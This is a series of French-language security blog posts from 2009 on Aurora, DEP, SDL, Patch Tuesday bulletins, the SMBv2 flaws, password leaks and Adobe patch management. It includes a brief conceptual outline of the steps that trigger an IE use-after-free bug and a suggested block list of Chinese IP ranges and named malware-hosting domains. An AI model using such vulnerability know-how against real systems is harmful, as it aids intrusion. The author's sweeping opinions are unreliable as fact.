Si vous êtes paranoïaque, il ne vous coûtera pas grand'chose de bloquer toutes les adresses IP chinoises sur votre réseau. Ainsi que tous les domaines de la forme "[0-9]+.{org|.net}" (par exemple, les domaines chinois 8800.org et 3322.net étant exclusivement connus pour héberger du malware).

FAIL#3 Data Execution Prevention (DEP)

Tous les problèmes de sécurité ont été résolus en même temps qu'ils sont apparus. Mais l'industrie s'est tout de suite confrontée aux problèmes, tandis que les solutions ont été beaucoup plus longues à faire leur chemin.

Ainsi au début des années 2000, le problème de la non-exécution de code dans les zones de données a été parfaitement résolu par PaX, mais ce patch n'a jamais été intégré dans le noyau Linux pour des histoires personnelles entre Linus et la PaX team.

Parmi les conditions de mise en oeuvre de la non-exécutabilité des données (DEP sous Windows), il est évident depuis le début que le positionnement des exécutables en mémoire doit également être aléatoire (ASLR), sinon il est possible d'utiliser une technique connue sous le nom de retour dans la libc.

Bref, tout le monde a spéculé sur l'efficacité de DEP pour protéger Internet Explorer. Outre le fait que les versions 6 et 7 n'utilisent pas DEP par défaut, cette protection est de toute façon inefficace sur Windows XP puisque le placement en mémoire des exécutables est prédictible (sauf à utiliser WehnTrust).

Le plus gênant dans cette affaire, ça n'est pas le fait que DEP puisse être contourné sous certaines conditions. C'est que personne n'a pris la peine de tester avec l'exploit public avant d'écrire tout et n'importe quoi.

FAIL#4 Secure Development Lifecycle (SDL)

Ce qui me semble extrêmement intéressant dans les dernières failles Internet Explorer et Acrobat Reader, c'est que les méthodes de développement sécurisé proposées par Microsoft (SDL) n'auraient pas permis de les éviter.

En effet, le SDL vise (entre autres) à bannir les API "dangereuses" (de type strcat() ou sprintf()) - c'est-à-dire à lutter contre les buffer overflows.

Or les failles dont on parle sont de type use after free. Par exemple dans le cas de la faille IE, celle-ci se résume à:

Ajouter un évènement sur un objet du DOM
Supprimer l'objet en accédant au DOM via JavaScript
Attendre que l'évènement soit invoqué

Trivial, n'est-il pas ? Pourtant ces failles sont extrêmement difficiles à détecter, aussi bien en analyse statique qu'en analyse dynamique (fuzzing) que par une revue de code manuelle, surtout sur du code massivement multi-threadé.

On peut donc suspecter que le use after free va encore faire parler de lui ... et pas seulement dans Internet Explorer 6 !

Conclusion

L'affaire "Aurora" ne change rien à mes conclusions antérieures. Si vous avez des vrais problèmes de sécurité, prenez conseil auprès de vrais spécialistes. 95% de l'information disponible sur Internet est partielle, fausse ou non vérifiée.

Dissonance cognitive

2009-12-21T13:30:00.000+01:00

Ca y est, j'ai terminé le Challenge Azure (je ne suis pas 1er car il a fallu un peu de temps pour brute-forcer le QCM :)

La mauvaise nouvelle pour vous, c'est que je suis maintenant officiellement autorisé à vous parler de Cloud Computing puisque j'ai envoyé mes applications "In The Cloud" :)

Mais pour être honnête, je n'ai jamais rencontré un challenge aussi grisant depuis la disparition de SecuriTech. Il existe plein de challenges passionnants et intelligents sur Internet, mais rien à faire: le temps limité ajoute un sentiment d'urgence très excitant.

Et le Challenge Azure est vraiment unique. Pourquoi ? Parce qu'il est facile de trouver la solution à tous les autres challenges publics. Soit parce qu'il existe des spoilers, soit parce que ce sont toujours les mêmes failles qui reviennent en boucle: buffer overflow, fichier setuid gérant mal ses privilèges, etc.

Alors que pour le Challenge Azure, il n'existe aucune solution. Personne ne peut vous aider, car personne ne sait comment ça marche. La documentation disponible sur Internet est fausse, car elle ne s'applique pas à la version CTP de novembre 2009. Bien que le challenge consiste simplement à corriger du code déjà écrit par des gens de Microsoft France, vous pouvez rester des heures à contempler une lambda-fonction C# destinée à requêter un blob dans votre storage sans comprendre une ligne de ce qui est écrit.

Et là, la vérité m'est apparue nue. Depuis 10 ans que je pratique la sécurité informatique en entreprise, je n'ai jamais rencontré un développeur (sauf des designers d'IHM en Java, mais je ne pense pas que ça compte). J'en ai pourtant audité des applications, j'en ai prodigué du conseil pour améliorer la sécurité des développements (comme compiler avec /GS, /NXCOMPAT et /SAFESEH) ... mais même dans les réunions de debriefing post-audit les plus houleuses, je n'ai jamais eu en face de moi que des intégrateurs ou des technico-commerciaux ...

Les entreprises dont le coeur de métier n'est pas l'IT n'embauchent pas de développeurs. Les seuls "développeurs" qu'on y recontrent sont des prestataires liés aux gros progiciels internes (comme SAP ou SharePoint). Ce sont souvent des consultants de l'éditeur ou de sociétés aux intérêts très liées. Le reste des applications sont achetées sur étagère, jamais développées en interne.

Et dans le domaine de l'application commerciale, il y a deux cas: soit la start-up avec quelques développeurs, parfois motivés, mais jamais très nombreux, et rarement sensibilisés à la sécurité. Soit la société qui a crû suffisamment pour sous-traiter ses développements en Roumanie, en Inde, au Vietnam, ou n'importe où ailleurs (mais toujours à un endroit où il sera impossible de communiquer avec les développeurs).

Alors après avoir pratiqué un peu sur la plateforme Azure, je souris intérieurement en pensant à la probabilité pour que ma société soit un jour cliente directe de cette solution (mais je pense que cela s'étend à d'autres sociétés françaises de la même envergure). Il est déjà probablement impossible de trouver un employé (pas un sous-traitant) qui sache écrire une ligne de C#. Alors de là à maitriser les subtilités du framework 4.0 ou de LINQ, c'est de la science fiction. Bien sûr il est également possible de développer du code PHP avec Eclipse pour la plateforme Azure, mais là on en est quasiment au stade de la manipulation génétique :)

Petit détail: le SDK Azure ne s'installe que sur Windows Vista et ultérieur. Rien que ce pré-requis est rédhibitoire quand on sait que l'écrasante majorité des postes de travail reste sous Windows XP, le SP2 n'ayant parfois pas été installé par peur des incompatibilités.

La seule voie par laquelle le Cloud a une chance de gagner les entreprises, c'est par la sous-traitance. Après tout, mon employeur m'a bien obligé à enregistrer mon numéro de carte bleue sur le site Web d'une société tierce en charge de tous les voyages et de toutes les notes de frais. Peut-être fait-elle déjà appel au Cloud ? Qui s'en préoccupe de toute façon ?

PS. Pourquoi le Cloud est-il l'avenir de l'informatique ? IDC pense qu'il n'y aura pas de successeur à Windows Seven. Vinton Cerf pense qu'en 2012, il y aura plus de téléphones connectés à Internet que d'ordinateurs. Il me semble que tout cela fait du sens: l'informatique telle que nous la connaissons va disparaitre. Les services informatiques sont déjà en train de disparaitre d'ailleurs ...

Le Monstre

2009-10-17T10:00:00.003+02:00

Et oui, le Patch Tuesday d'octobre est tout simplement ... monstrueux ! Avec 13 bulletins corrigeant 33 failles, c'est un record dans l'histoire des bulletins de sécurité Microsoft.

Il faut dire que traditionnellement, avant chaque lancement d'une nouvelle version de Windows, Microsoft vide son placard des failles accumulées. Et Windows Seven sort le 22 octobre ...

Impossible de rentrer dans les détails techniques de tous ces correctifs en un seul billet. Je me contenterai de donner quelques remarques ou anecdotes concernant ces bulletins.

MS09-050 corrige 3 failles dans l'implémentation du protocole SMBv2: celle trouvée par Laurent Gaffié (qui n'est pas crédité, en châtiment de son irresponsible disclosure), et une autre faille exploitable trouvée par Matthieu Suiche (l'un de mes anciens stagiaires :). Notons que ces deux français sont expatriés: l'un au Canada, l'autre aux Pays-Bas.

MS09-051 corrige des failles dans un obscur codec de Windows Media, optimisé pour le traitement de la voix. Mais ce bulletin est symptomatique du fait qu'il faut lire les bulletins, et pas seulement appliquer les correctifs. En effet, ce codec n'est pas présent par défaut dans Windows Media Player 6.4 sur Windows 2000, mais a pu être installé par le mécanisme de recherche automatique des codecs en ligne. Si c'est le cas, une opération manuelle est requise sur le poste.

MS09-053 corrige des failles (déjà connues) dans le serveur FTP de Microsoft. Bizarrement, Kingcope est crédité alors que la publication de ces failles a été tout sauf responsable !

MS09-054 est un correctif cumulatif pour Internet Explorer. L'une des failles est exploitable par le biais de la technologie XBAP: il ne s'agit rien de moins que de créer des applications complètes (en code managé) qui vont être téléchargées et exécutées dans le navigateur ! Un remplacement des ActiveX et un concurrent pour la technologie Native Client de Google.

Là où ça devient fort, c'est que l'installation du Framework .NET 3.5 (pré-requis à l'exécution d'applications XBAP) va automatiquement installer une extension Firefox (si ce navigateur est présent). Donc même Firefox sur Windows est vulnérable à cette faille ! Du coup, la fondation Mozilla a désactivé cette extension par le biais des mises à jour automatiques de plugins ... Est-ce que Microsoft va réactiver le plugin par le biais de Windows Update ?

MS09-056 corrige deux failles dans la CryptoAPI (le pendant Windows de la libssl), permettant de tricher sur les propriétés d'un certificat. Manque de chance, ce correctif n'est pas compatible avec le produit Microsoft OCS - un produit de communication unifiée très en vogue actuellement: il provoque l'invalidation des clés de licence ...

MS09-061 permet basiquement d'exécuter du code "natif" depuis du code "managé", même si celui-ci s'exécute avec les droits minimum. Il s'agit d'une évasion de machine virtuelle comme Java en a connu par le passé. Dès lors que vous exécutez du code "managé" depuis une source non sûre, vous êtes exposés: applications XBAP, hébergement ASP.NET, mais aussi plugin SilverLight (le concurrent Microsoft d'Adobe Flash Player). Ce dernier est un produit important dans le portfolio Microsoft ...

L'auteur de l'un de ces bogues (Jeroen Frijters) n'en est pas à son coup d'essai. Pour la petite histoire, il est leader d'un projet Open Source visant à implémenter une machine Java en .NET (le projet IKVM). Dans le cadre de ce projet, il a déjà remonté plusieurs bogues critiques à Microsoft, qui ont tous été corrigés silencieusement. Du coup, il avait décidé d'appliquer ce qu'il appelle la "no Microsoft bug filing policy". Il faut croire que Microsoft s'en est ému.

PS. Si vous vous demandez à quoi peut bien servir une machine Java en .NET, sachez qu'il en existe déjà une, fournie par Microsoft: il s'agit de la technologie J#. C'est très pratique lorsque Microsoft fait l'acquisition d'applications entièrement écrites en Java ;) Seul problème: cette technologie a été développée à Hyderabad et s'avère ni fiable (d'après Jeroen Frijters), ni pérenne (d'après Wikipedia).

MS09-062 corrige un paquet de failles dans GDI+. Pour mémoire, GDI+ est la librairie qui traite tous les formats d'image sous Windows - l'impact potentiel de ces failles est donc énorme, compte-tenu du nombre de vecteurs d'attaque. Souvenez-vous, déjà en 2004 certains avaient prédit le "Big One" avec la faille JPEG dans cette même librairie (MS04-028).

Comme facteur aggravant, il faut noter que le code GDI+ est disponible sous forme de librairie dans les outils de développement Microsoft. Il est donc possible de lier statiquement ce code à toute application développée avec Visual Studio. Conclusion: malgré la mise à disposition par Microsoft (à l'époque) d'un outil de recherche de motifs dans le code compilé, il est impossible de venir entièrement à bout de cette faille dans toutes les applications tierces.

Notons que l'une de ces failles permet d'exécuter du code "natif" depuis du code "managé" (évasion du Framework .NET). Java a connu les mêmes: il s'agit d'un risque rampant, sauf à réécrire toutes les librairies graphiques en code managé.

Notons aussi que Thomas Garnier (SkyRecon) est crédité pour la découverte de l'une de ces failles. Sachant qu'il a quitté SkyRecon autour du mois de février 2009 (pour aller chez Microsoft), cela donne une idée du délai de correction de cette faille ... La faille dans les graphiques Office a été vendue à iDefense en avril 2008, et celle sur le format TIFF en ... décembre 2007 !

Que conclure de tout cela ?

Je ne vais pas employer un mot commençant par "E..." pour ne pas lasser mes lecteurs. Mais quand même, mettre plus d'un an à corriger des failles, corriger silencieusement des failles critiques dans le Framework .NET (exploitables à distance via SilverLight), introduire des failles dans des applications tierces comme Firefox ... ça la fout mal pour les champions du développement sécurisé ...

Pour finir, félicitations aux équipes de Google et Palo Alto Networks pour le nombre de failles qu'elles ont trouvées ! (Ce dernier étant un pare-feu innovant qui a fait du buzz lors des Assises de la Sécurité).

Pourquoi la sécurité ne va pas s'améliorer

2009-10-07T14:00:00.000+02:00

Il n'a échappé à personne que 10,000 mots de passe Hotmail ont été "aperçus" sur le site pastebin.com. Pour ceux qui ne connaissent pas, PasteBin est un site gratuit et anonyme permettant d'échanger rapidement des données textuelles entre amis et avec le monde entier par la même occasion. Ce qui est l'occasion de voir parfois à quel point les gens sont confiants ...

L'origine de cette divulgation est probablement liée à une campagne de phishing.
Comme à chaque fois qu'une base importante de mots de passe est perdue, c'est l'occasion d'enrichir ses connaissances sur les pratiques des utilisateurs confrontés au problème crucial du choix d'un mot de passe.

Malheureusement, dans le cas de Hotmail comme dans tous les cas antérieurs (ex. phpbb.com), le mot de passe le plus courant est ... "123456".

Qu'est-ce que cela m'inspire ? Qu'après avoir lutté pendant des années pour mettre en place des politiques de robustesse sur les mots de passe dans les entreprises (c'est même une recommandation forte ou une exigence dans la plupart des normes et standards comme PCI/DSS ou ISO 2700x), le Web 2.0 nous fait revenir 20 ans en arrière.

La différence, c'est que le Web 2.0 a des clients là où les entreprises ont des utilisateurs. Et même si les utilisateurs sont (parfois) pénibles, on peut les contraindre à obéir. Alors que le client est roi ...

La situation est même pire que cela, puisque les clients du Web 2.0 sont les annonceurs. L'utilisateur, lui, ne paie rien et ne s'engage à rien (les contrats transnationaux signés par un simple clic sur "oui, j'accepte" n'ayant probablement aucune valeur légale). Il est donc essentiel de choyer l'utilisateur pour qu'il n'aille pas voir ailleurs. Et dans ce domaine, imposer des mots de passe complexes est tout sauf user-friendly.

Dans le Web 2.0, c'est le marketing qui arbitre sur les exigences de sécurité. Les informaticiens ayant une activité professionnelle à forte composante technique, qui se sont retrouvés rattachés du jour au lendemain à une direction marketing (j'en connais beaucoup), apprécieront l'impact potentiel ...

Quelques-uns, comme MySpace, imposent une relative complexité sur le mot de passe (lettres ET chiffres). Résultat: le mot de passe le plus commun sur ce site est ... "password1" (on notera au passage que les "gens normaux" commencent à compter à partir de 1, et non 0 comme tout informaticien qui se respecte :).

Est-ce que cela impacte les entreprises d'une manière ou d'une autre ? Je ne vais pas me lancer dans des débats sur l'informatique nébuleuse (Cloud Computing) ou la dépendance cachée à GMail ...

Mais quand on voit le nombre de sites institutionnels qui utilisent Google Analytics, sans que la politique sécurité de l'entreprise ne soit applicable au mot de passe choisi ... le fait que la majorité des gens réutilisent le même mot de passe partout ... et la dépendance chainée entre les différents services 2.0 par le biais de la réinitialisation de mot de passe (comme dans le cas emblématique de Twitter) ... je suis quand même vaguement inquiet, et pas du tout confiant dans le fait que les choses vont s'améliorer !

L'échec de Microsoft

2009-09-19T09:00:00.000+02:00

Dans Windows, il n'y a que 3 points d'entrée à défendre:

La pile TCP/IP
L'implémentation SMB (sur les ports TCP/139 et/ou TCP/445)
L'implémentation du RPC endpoint mapper (port TCP/135)

En effet, ces 3 points d'entrée sont toujours accessibles quels que soient la version et le mode d'utilisation de Windows (machine personnelle, poste de travail, serveur, etc.).

Il est possible de n'avoir aucun port ouvert sur l'extérieur (moyennenant quelques astuces telles que la configuration de la clé de base de registre "ListenOnInternet"), mais en pratique je n'ai jamais vu une machine configurée de la sorte ailleurs que dans les labos de recherche.

Avec Windows Vista (sorti en novembre 2006, pour mémoire), Microsoft a modifié deux composants fondamentaux:

La pile TCP/IP, entièrement réécrite pour supporter nativement IPv6.
L'implémentation SMB, passée en version 2. Cette version est supposée plus simple (donc plus sûre) avec seulement 16 commandes au lieu de 80.

Bien sûr, avec tout le tremblement autour du Secure Development Lifecycle, on aurait pu penser que le remplacement de 2 composants critiques sur 3 se ferait avec toutes les précautions possibles.

Ca sentait pourtant mauvais, puisque la pile IP s'est d'abord avérée partiellement vulnérable à la Land Attack (avant la sortie de la RTM), puis une faille conceptuelle dans l'implémentation de la signature SMB a obligé Microsoft à mettre à jour le protocole en version 2.1 (bulletin de sécurité MS07-063).

Mais ce mois-ci, c'est le drame.

Non seulement la pile IP s'avère vulnérable à une faille d'exécution de code à distance (pas triviale, je l'avoue) - CVE-2009-1925, à ne pas confondre avec la faille SockStress qui a été patchée dans le même bulletin (MS09-048) - mais surtout il n'a échappé à personne qu'une faille d'exécution de code à distance (confirmée par Microsoft) non patchée affecte la pile SMBv2.

Quelles leçons tirer de tout cela ?

On ne peut avoir confiance en personne. Malgré un budget de 4 milliards de dollars pour le développement de Vista, le recrutement de toutes les pointures en sécurité disponibles sur le marché, et des objectifs affichés en matière de sécurité, Microsoft a raté[*] une faille assez triviale (à détecter, pas à exploiter :) et catastrophique en terme d'impact.
Il n'y a eu aucune analyse correcte de la faille sur Internet. Je n'ai vu que SourceFire et ReverseMode aborder le sujet sous un angle vaguement technique, sans toutefois rentrer dans les détails. Ca ne veut pas dire que personne ne comprend rien - ça veut dire que les gens qui travaillent sérieusement sur cette faille ne sont pas payés pour faire fuir les détails sur leur blog ...
Par contre des gens pour réécrire le code d'exploitation en Java et s'accorder tous les crédits, il y en a eu. J'attends la version PHPCLI ...
Les loups sont lâchés. Je prédis d'autres failles sur SMBv2 (bon là je triche un peu ;).
Et vive la France, puisque tous les acteurs de la chaine sont francophones ! Laurent Gaffié (on m'a dit qu'il était québecois, mais je ne le connais pas personnellement), Kostya Kortchinsky et Nicolas Pouvesle.

[*] Est-ce que Microsoft a vraiment "raté" cette faille ? Pas tout à fait sûr, puisque la faille a été corrigée dans Windows Seven entre la RC et la RTM. Reste à savoir si cette correction a été apportée sans comprendre l'impact de la faille ("à la Linux"), ou si Microsoft a tout à fait compris l'enjeu ... et décidé de passer la faille sous le tapis, ce qui serait vraiment malhonnête de la part d'une société qui prétend donner des leçons de sécurité à tout le monde !

PS. Bienvenue aux lecteurs de la newsletter XMCO n°23 :)

Je suis fâché contre Dell

2009-09-15T10:00:00.003+02:00

Ces derniers temps, mes collègues et moi avons eu plusieurs expériences malheureuses avec Dell: délais de livraison allongés de manière incompréhensible, supports technique et commercial totalement inutiles, disponibilité des pilotes Vista plusieurs mois après la sortie du matériel (alors que la machine est livrée par défaut sous Vista), conception matérielle douteuse (ex. connecteurs trop fragiles), etc.

Mais sur le site de Dell, franchement, on est à la limite de l'escroquerie:

Ecrire le tarif de la hotline en noir sur fond noir, ça ne doit pas être très légal, surtout à 0,15€/mn.

Edit: pour les gens qui ne veulent pas installer Flash (excellente idée au demeurant) ou qui ne peuvent pas installer Flash, voici les screenshots.

Message aux lecteurs de DC

2009-09-04T08:00:00.000+02:00

Désolé pour ceux qui ne connaissent pas "DC", cela ne devrait toutefois pas les arrêter de lire la suite (j'essaie d'éviter les private jokes autant que possible).

"DC" est de la génération W: il blogue par email. Il a toutefois la courtoisie de ne pas mettre tous ses destinataires en copie ouverte, contrairement à d'autres (ce qui me vaut au passage l'insigne honneur d'avoir mon email publié dans ZF05).

A la lecture de sa dernière lettre, il m'a semblé opportun de dissiper ici les malentendus qu'ont pu engendrer un billet antérieur, interprêté comme une tentative de troll, voire une résurrection de l'analogie éculée entre industrie informatique et industrie automobile (cf. commentaires du susdit billet).

Pourtant mon propos initial était brûlant d'actualité (c'est d'ailleurs le propre d'un blog): il s'agit de l'irruption des Etats dans le domaine de la Sécurité des Systèmes d'Information (Obama en étant le champion).

En effet, jusqu'à présent, on ne peut pas dire que le pouvoir politique ait beaucoup contribué au domaine de la SSI. Aucun homme public n'a signalé (à ma connaissance) s'il était pour ou contre le full disclosure, un sujet qui a pourtant fait circuler beaucoup d'électrons ...

Quant au pouvoir judiciaire, il s'intéresse essentiellement aux crimes et délits "de la vraie vie" ayant parfois un support informatique (vol, chantage, racket, pornographie, etc.). Si vous souhaitez porter plainte pour négligence contre Debian, allez expliquer au juge que vous avez été compromis à cause d'une défaillance dans le générateur d'entropie d'OpenSSL !

L'essentiel de l'action publique visible dans le domaine de la SSI se limite à la certification Critères Communs de quelques systèmes cryptographiques, essentiellement matériels.

Mais l'informatique a un problème de fond, qui s'appelle le COTS.

Car dans tous les domaines numériques, c'est désormais le marché "grand public" qui dicte les choix technologiques. Et les Etats (ce qui inclut l'administration, la police, l'armée, etc.) ne font pas mieux: ils utilisent Windows (ou Linux). Ils ont confiance dans leurs antivirus. Ils utilisent du WiFi, du BlueTooth et du GSM. Ils utilisent BlackBerry. Ils utilisent Internet (voire des Livebox) comme réseau de transport pour les liaisons point à point. Ils ont des sites Web publics (qui ne sont plus éteints la nuit). Même la Chine, qui prétend utiliser son propre système d'exploitation, n'a fait que repackager un FreeBSD.

Bien sûr, il n'y a pas que les Etats qui sont dans cette situation. Toutes les industries, y compris les plus critiques, reposent sur des réseaux Windows (plus ou moins) connectés à Internet. Je ne suis pas spécialiste SCADA, mais je connais un peu le réseau inter-aéroportuaire SITA. Ainsi que le grand usage d'Excel (et de ses macros) dans les banques.

Compte-tenu du coût, de la pauvreté de l'offre de solutions (sérieuses), et de la technicité requise pour assurer un bon niveau de sécurité dans un réseau de technologies COTS, il n'y aucune raison pour que "ce soit mieux ailleurs".

Après tous, un botnet de quelques milliers de machines arrive à éteindre Facebook (on notera là encore l'effet de levier du grand public sur l'informatique professionnelle). Or c'est à la portée de n'importe quel lycéen. Et il n'y a aucune raison pour que impots.gouv.fr soit mieux protégé contre les DDoS que Facebook.

Dans ces conditions, il est évident que la SSI est devenue un enjeu majeur pour les Etats. Mais là, plutôt que de légiférer (intelligement) sur le sujet (une fonction régalienne assez pratique), il semble que la politique actuelle soit plutôt ... de commencer à jouer sur le terrain technique de la SSI !

Il est vrai que voter des lois nationales pour les appliquer à un réseau international (et de fait contrôlé par les acteurs américains du domaine: Microsoft, Cisco, Google, VeriSign, etc.) semble voué à l'échec, sauf à construire un Internet français. Malheureusement, la Chine a été trop critiquée sur le sujet pour qu'on puisse ouvertement mettre en place les mêmes solutions chez nous.

Mais de là à espérer résoudre le problème par une contre-attaque technique ... cela suppose que l'Etat soit le plus fort dans le domaine, ce qui est loin d'être prouvé compte-tenu de la nature asymétrique des menaces numériques: les COTS sont tellement fragiles qu'un petit groupe organisé peut causer des dégâts considérables.

Quelques exemples d'actualité, dans lesquels l'Etat assume la responsabilité de logiciels COTS oeuvrant dans le domaine de la sécurité:

Les "mouchards numériques" imaginés dans LOPPSI 2. Si le mouchard est logiciel, une confrontation inévitable va s'en suivre avec les éditeurs antivirus (et assimilés). Il n'est pas sûr que l'Etat arrive à développer des backdoors indétectables sur le long terme par tous les outils de contrôle d'intégrité du marché.
La détection des téléchargements illégaux dans le cadre de la loi HADOPI. La collecte et le traitement des données ont été confiés à une société privée. Quelles conséquences si cette base de données (voire le système en amont chez les FAI) est compromise ?
La CSPN. Ce qui au départ devait être une certification administrative de type Critères Communs (tous ceux qui se présentent finissent par l'avoir ... tôt ou tard !) se transforme ni plus ni moins en une collecte de failles d'implémentation dans des produits COTS (un ZDI-like français ? Mais que va faire VUPEN !). Je ne peux pas croire que seuls 3 produits se soient présentés depuis la création de cette certification: l'Etat doit donc disposer d'un sacré stock de "0day" :) Car par expérience: "tout produit qui n'est pas un produit de sécurité, et qui n'a pas été conçu par des gens de la sécurité, est truffé de failles de sécurité" ...
L'ANR SEC&SI. Ou comment essayer de régler le problème des malwares sur Internet en proposant à Mme Michu un système ultra-sécurisé, permettant de lire son mail, d'ouvrir des documents (Open)Office et de surfer sur Internet en toute confiance. C'est une lourde responsabilité pour l'éditeur d'une telle solution, comme en ont fait les frais les Chinois avec leur logiciel de filtrage Green Dam. La mission n'est pas totalement impossible, si on oublie tout critère d'ergonomie et de convivialité (laissez tomber Flash) ... mais Windows Seven n'est-il pas déjà assez sécurisé pour ce qu'on fait sur Internet ? ;)

Tous ces projets ont en commun d'impliquer l'Etat à très bas niveau (technique) dans le domaine des technologies "grand public". Imagine-t-on un jour un produit antivirus certifié CSPN et recommandé sur le site de l'ANSSI ? Même si l'objet de la CSPN est différent, on sait ce qui est arrivé à tous les gens qui ont annoncé être unbreakable.

Je ne parlerai pas des projets de cyber-guerre, qui impliquent de doter les services de l'Etat de capacités offensives. Un gradé américain avait quand même proposé que tout bon patriote installe le bot officiel du gouvernement américain sur son poste, pour donner à son pays la capacité de lancer des DDoS ! La sécurité des COTS est dans un état tellement lamentable que l'attaque est plusieurs ordres de magnitude plus facile que la défense, la cyber-guerre devrait donc réussir.

Le vrai problème, et ce sera ma conclusion pour aujourd'hui, ne sont pas les mérites respectifs de l'industrie automobile et de l'industrie informatique. Le vrai problème, c'est que l'Etat semble désormais décidé à vouloir faire régner l'ordre numérique, et choisit pour cela d'oeuvrer dans les domaines techniques de la SSI. Mais s'il est possible de rentrer dans la police sans aucun diplôme, il n'est pas 1% des élèves issus des écoles d'informatique qui n'aient le hacker mind (les autres voulant pour la plupart devenir chef de projet Java ou PHP).

Il reste donc à savoir si l'Etat a les moyens de ses ambitions. Or si le peu de gens brillants et motivés qui restent quittent le pays pour trouver beaucoup mieux ailleurs, comme mon précédent billet s'en faisait l'écho, cela ne me semble pas de bon augure.

On m'objecte souvent que la majorité des excellents professionnels qui oeuvrent en France sont totalement invisibles. Ce qui est probablement exact, car j'ai déjà rencontré des gens dont le nom n'apparait pas une seule fois dans Google et dont les compétences ne peuvent pas être mises en doute. Mais alors, à quoi sont utilisées ces compétences ?

PS. Je ne rentrerai pas dans le débat sur les causes de l'échec de Multics, dont il est aussi question dans le message de "DC" :)

L'envers du décor

2009-08-24T08:00:00.002+02:00

Quand j'étais petit, je pensais que le problème de la sécurité était résolu (c'était plus facile à l'époque, il faut dire).

Je mettais à jour ma machine dès que possible, je n'avais aucun port ouvert sur Internet, des mots de passe robustes, et un antivirus (déjà !). A l'époque les navigateurs ne posaient pas problème: l'historique de sécurité de NCSA Mosaic est pour ainsi dire vierge :)

Plus grand, je suis sorti d'école sans savoir rien faire et je suis donc devenu consultant en SSII (comme beaucoup de jeunes diplômés). J'ai ainsi pu distribuer des conseils à des gens qui semblaient persuadés que j'en savais plus qu'eux - ce qui était malheureusement probablement vrai (note: j'ai un billet sur le jeunisme dans l'informatique en préparation :).

Plus tard, j'ai pris en charge bénévolement l'administration du réseau informatique dans la TPE de ma femme. Avec de vrais utilisateurs complètement étrangers à l'informatique (sauf le commercial, qui a un Mac). Et là, j'ai commencé à voir l'envers du décor ...

Maintenir en sécurité - et donc à jour - un parc logiciel de taille même modeste relève de la gageure avec les outils logiciels qui nous sont proposés aujourd'hui par les éditeurs.

Microsoft facilite vraiment la tâche des administrateurs avec l'installation automatique des correctifs pour tous leurs logiciels, avec ou sans WSUS, et le déploiement centralisé d'applications.

De mon point de vue, la palme de l'horreur dans le domaine revient sans conteste aux logiciels Adobe (Acrobat Reader et Flash particulièrement, ainsi que ShockWave récemment). Ces logiciels sont victimes de la combinaison des facteurs suivants:

Ils sont incontournables (Flash, toutes versions confondues, dépasse les 99% de déploiement dans le monde).
Ils font l'objet de problèmes de sécurité récurrents.
Ils sont accessibles via un navigateur.
En conséquence ... ils sont ciblés par de vraies attaques provenant d'Internet.

Se protéger nécessite au minimum de mettre à jour et de diminuer la surface d'attaque de ces logiciels.

En ce qui concerne la mise à jour, c'est la croix et la bannière. Le système de mise à jour automatique (intégré) nécessite d'être administrateur local du poste. Et l'utilisateur final doit prendre la décision de mise à jour, au travers d'une boite de dialogue - échec.

En ce qui concerne Flash, un fichier d'installation ".msi" est disponible, ce qui permet d'utiliser les fonctions natives de distribution logicielle dans Windows et de contourner les problèmes précédents.

Ce qu'on sait moins, c'est que la distribution de ce fichier ".msi", même en entreprise, est soumise à accord préalable et discrétionnaire de la part d'Adobe !

En ce qui concerne Acrobat Reader, c'est l'enfer.

Les seules versions téléchargeables en format ".msi" sont les versions 9.1.0 et 8.1.3. Enfin je crois, car l'ergonomie du site Web d'Adobe laisse à désirer ... On peut passer par ici ou par là pour récupérer ces versions mais il existe peut-être des portes dérobées.

Quand je dis ".msi", il faut comprendre une version compressée avec NOSSO dans laquelle il est possible de trouver le ".msi" après quelques manipulations (notez que la documentation d'installation d'Acrobat Reader est elle-même au format PDF :) ... Sans parler de la version anglaise d'Acrobat Reader, qui installe également AIR si l'on n'y prend garde.

Au jour où j'écris ces lignes, les seules versions d'Acrobat Reader sans bogue connu et publié sont les versions 9.1.3 et 8.1.6. Pour arriver à ces versions, il faut télécharger des correctifs au format ".msp". Passons sur le sans-débit (<= 56K) qui a récupéré une version d'Acrobat Reader sur un CD AOL: il ne peut pas être à jour sans télécharger presque 100 Mo de correctifs.

L'organigramme d'application des susdits correctifs ne suit aucune logique. Certains correctifs nécessitent de disposer de la version N-1, d'autres peuvent être appliqués sur les versions N-1, N-2 ou N-3. Ce qui cause visiblement des problèmes.

Après avoir appliqué tous les correctifs et redéployé entièrement l'application, reste le problème de la défense en profondeur: la désactivation de JavaScript dans Acrobat Reader (mesure conservatoire nécessaire mais non suffisante par les temps qui courent).

Cette opération s'effectue dans la base de registre au travers de la clé bEnableJS, dont l'emplacement exact varie d'une version d'Acrobat Reader à l'autre.

Vous trouverez des modèles d'administration (fichiers ".adm) "tout fait" sur Internet vous permettant de régler ce paramètre. Seul problème: une fois le fichier ".adm" chargé dans la console de gestion des stratégies de groupe, aucun paramètre n'est visible ...

Je vous donne les trucs que personne ne documente (applicables au moins à Windows 2003 R2):

Le parser de fichiers ".adm" étant ce qu'il est, il faut obligatoirement terminer par un retour à la ligne (sinon le dernier caractère de la dernière ligne est omis).
Les clés de base de registre n'étant pas des sous-clés de "Software\Policies" ne sont pas affichées par défaut. Il faut changer le filtre d'affichage dans la GPMC.

Ce dernier comportement s'explique par le fait que les modifications apportées ailleurs que dans "Software\Policies" sont permanentes (ce que Microsoft appelle le "tatouage" de la base de registre). A contrario, les paramètres gérés par une politique sont appliqués dynamiquement.

Tout ça pour qu'à l'ouverture d'un fichier PDF contenant un JavaScript, l'utilisateur se voie proposé de le réactiver "afin de bénéficier de toutes les fonctionnalités du document" ...

Mais au moins, Acrobat Reader a l'avantage sur Flash (et sur FireFox, accessoirement) d'être configurable par la base de registre, et non par une saleté de fichier binaire ".sol" configurable uniquement en passant par le site d'Adobe !

Si j'avais un seul message à faire passer à Adobe, cela serait probablement "with great power comes great responsibility" ...

Quant à moi j'en tire les conclusions suivantes:

La sécurité est un échec.
Il est impossible d'être un bon auditeur sans être un excellent administrateur.
Personnellement, je désinstalle Flash à chaque annonce de faille pour être sûr de toujours récupérer la dernière version au moment où j'en ai vraiment besoin.
Et enfin, le réseau de ma femme est probablement plus sûr que celui des entreprises du CAC40 ... la sécurité est un échec, à nouveau !

Faut-il passer à Windows Seven ?

2009-08-17T08:00:00.002+02:00

Très franchement, je n'en sais rien :) Mais la question se pose, puisque 2 personnes proches, n'ayant jamais acheté de logiciel auparavant, se sont payés un Windows Seven en précommande.

